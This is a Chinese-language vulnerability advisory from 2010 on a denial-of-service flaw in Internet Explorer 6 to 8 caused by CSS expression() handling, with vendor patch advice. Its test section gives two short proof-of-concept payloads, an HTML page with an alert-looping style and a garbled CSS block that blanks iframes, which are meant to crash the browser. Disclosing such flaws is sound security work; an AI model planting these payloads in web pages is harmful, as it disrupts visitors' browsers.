发布日期：2010-06-01
更新日期：2010-06-02

受影响系统：

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0

描述：

---

BUGTRAQ  ID: 40487

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

Internet Explorer没有正确地处理级联样式表单中的expression，可能导致浏览器无法正常工作。

<*来源：MustLive （mustlive@websecurity.com.ua）
  
  链接：http://marc.info/?l=bugtraq&m=125778617727776&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<p style="dos:expression(alert('DoS'))">IE DoS</p>
</body>
</html>


<style type="text/css">
<! -
The question is which set the css style of the time wrong.
css definition is f: expression (this.src = 'about: blank', this.outerHTML ='');
In question should be is mshtml.dll ->
/*<![ CDATA [*/
iframe{
f: expression(this.src='about:blank',this.outerHTML='');
}
# F126 (v: expression ()! Important)
/*]]>*/
</ Style>
<iframe id=f126 src=test>

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：4439
严重程度：0（网友投票）